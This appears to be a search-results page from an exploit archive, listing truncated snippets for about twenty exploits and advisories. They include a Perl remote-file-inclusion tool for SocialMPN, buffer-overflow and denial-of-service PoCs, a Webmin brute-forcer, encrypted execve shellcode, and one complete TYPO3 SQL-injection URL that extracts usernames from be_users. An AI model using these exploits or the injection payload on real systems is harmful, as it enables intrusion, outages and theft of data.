7385 matches found
socialMPN.txt
!/usr/bin/perl -w Remote Testing SocialMPN Remote File Inclusion by y3dips for testing only Bug find by zer0-c00l , Bug published at http://waraxe.us/ftopic-542-0-days0-orderasc-.html print " Remote Testing File Inclusion for SocialMPN by y3dips \n"; require LWP::UserAgent; if@ARGV == 2 $target=...
Ethereal 0.10.9 (Windows) - 3G-A11 Remote Buffer Overflow
Ethereal 0.10.9 Windows - 3G-A11 Remote Buffer Overflow / Ethereal IAPP remote buffer overflow 2 PoC exploit --------------------------------------------------- To test this vulnerability on windows, try to send 3-10 packets that will trigger the crash, and scroll between captured packets in...
SocialMPN Arbitrary File Injection Exploit
No description provided by source. !/usr/bin/perl -w Remote Testing SocialMPN Remote File Inclusion by y3dips for testing only Bug find by zer0-c00l , Bug published at http://waraxe.us/ftopic-542-0-days0-orderasc-.html print " Remote Testing File Inclusion for SocialMPN by y3dips \n"; require...
SocialMPN - Arbitrary File Injection
!/usr/bin/perl -w Remote Testing SocialMPN Remote File Inclusion by y3dips for testing only Bug find by zer0-c00l , Bug published at http://waraxe.us/ftopic-542-0-days0-orderasc-.html print " Remote Testing File Inclusion for SocialMPN by y3dips \n"; require LWP::UserAgent; if@ARGV == 2 $target=...
SocialMPN - Arbitrary File Injection
SocialMPN - Arbitrary File Injection !/usr/bin/perl -w Remote Testing SocialMPN Remote File Inclusion by y3dips for testing only Bug find by zer0-c00l , Bug published at http://waraxe.us/ftopic-542-0-days0-orderasc-.html print " Remote Testing File Inclusion for SocialMPN by y3dips \n"; require...
SocialMPN Arbitrary File Injection Exploit
Exploit for unknown platform in category web applications ========================================== SocialMPN Arbitrary File Injection Exploit ========================================== !/usr/bin/perl -w Remote Testing SocialMPN Remote File Inclusion by y3dips for testing only Bug find by...
Remote Testing SocialMPN Remote File Inclusion by y3dips
!/usr/bin/perl -w Remote Testing SocialMPN Remote File Inclusion by y3dips for testing only Bug find by zer0-c00l , Bug published at http://waraxe.us/ftopic-542-0-days0-orderasc-.html print " Remote Testing File Inclusion for SocialMPN by y3dips n"; require LWP::UserAgent; if@ARGV == 2 $target=...
typo3sql.txt
Here is a POC for the typo3 issue to test if you are vulnerable. This doesn't pull the password, just the username : http://path/?&action=getviewcategory&categoryuid=-99%20UNION%20SELECT%20use rname%20FROM%20beusers%20WHERE%20uid=1/ Also, it's easy to pull lists of data from the database using th...
Apache <= 2.0.52 HTTP GET request Denial of Service Exploit
No description provided by source. !/usr/bin/perl Based on - apache-squ1rt.c exploit. Original credit goes to Chintan Trivedi on the FullDisclosure mailing list: http://seclists.org/lists/fulldisclosure/2004/Nov/0022.html More info - http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0942...
RHEL 4 : firefox (RHSA-2005:176)
The remote Redhat Enterprise Linux 4 host has a package installed that is affected by multiple vulnerabilities as referenced in the RHSA-2005:176 advisory. Mozilla Firefox is an open source Web browser. A bug was found in the Firefox string handling functions. If a malicious website is able to...
RHEL 4 : kernel (RHSA-2005:092)
The remote Redhat Enterprise Linux 4 host has packages installed that are affected by multiple vulnerabilities as referenced in the RHSA-2005:092 advisory. The Linux kernel handles the basic functions of the operating system. This advisory includes fixes for several security issues: iSEC Security...
[Full-Disclosure] Advisory: SQL-Injection in CitrusDB
Advisory: SQL-Injection in CitrusDB A group of students at our lab called RedTeam found an SQL-Injection vulnerability in CitrusDB. Details ======= Product: CitrusDB Affected Version: 0.3.6 verified, probably = 0.3.5, too Immune Version: none OS affected: all Security-Risk: low Remote-Exploit: no...
Veritas Backup Exec Agent 8.x/9.x - Browser Overflow
/ Got to give it to class101 on this one. Tested and penetrated. / str0ke / / VERITAS Backup Exec v9.1.4691.SP1 v9.1.4691.SP0 v8.5.3572 Agent Browser Service, Remote Stack Overflow Highly Critical All credits to: -iDEFENSEdiscovery-www.iDEFENSE.com, -Thor Doomeniat-syscallatinbox.lv, -H.D...
Webmin 1.5 - Web Brute Force (CGI)
Webmin 1.5 - Web Brute Force CGI !/usr/bin/perl use CGI qw:standard; use IO::Socket; $CGI::HEADERSONCE = 1; $CGI = new CGI; $atak = $CGI-param"atak"; $host = $CGI-param"host"; $wlist = $CGI-param"wlist"; $cmd = $CGI-param"cmd"; print $CGI-header-type='text/html',-charset='windows-1254'; print...
Norton AntiVirus 2005 - Remote Stack Overflow
Norton AntiVirus 2005 - Remote Stack Overflow...
Microsoft Internet Explorer - Remote Code Execution
CMDExe - Windows Exploit - Remote code execution with parameters - Proof of ConceptMore info about this exploit can be found at hhttp://freehost19.websamba.com/shreddersub7/expl-discuss.htm. © 2004 ShredderSub7 function DisplayLocStrings Title.innerHTML = TAGSYSCONFIG; ConfigLink.innerHTML =...
Ricoh Aficio 450455 PCL 5e Printer - ICMP Denial of Service
Ricoh Aficio 450455 PCL 5e Printer - ICMP Denial of Service / RICOH Aficio 450/455 PCL 5e Printer ICMP DOS vulnerability Exploit. DATE: 12.15.2004 Vuln Advisory : Hongzhen Zhou Exploit Writer : x90cKyong [email protected]/jyj9782 Testing -----------------------------------------------...
Apache 2.0.52 Multiple Space Header Denial of Service Exploit (v2)
Exploit for unknown platform in category dos / poc ================================================================== Apache 2.0.52 Multiple Space Header Denial of Service Exploit v2 ================================================================== / Apache Squ1rt, Denial of Service Proof of...
Multiple Browsers - Tabbed Browsing
Test Your Browser Open the link below in a new tab, then try to type data into form fields on the CitiBank website. Open this Link in New Tab Result: Keystrokes you pressed on the CitiBank website. /textarea // milw0rm.com 2004-10-22...
linux/x86 execve /bin/sh encrypted 58 bytes
No description provided by source. / !!!!!! PRIVATE !!!!!!! // ANTI-IDS SHELLCODE // // !!!!!!!!!!!!!!!!!! // [email protected] 0x1d abril 0x7d2 ./test.c !!! Shellcode execve sh Encriptada !!! AHORA EN 58 BYTES !!!!!!!!!!!!!! Notese que la encripcion se ha hecho a toda la shellcode y no...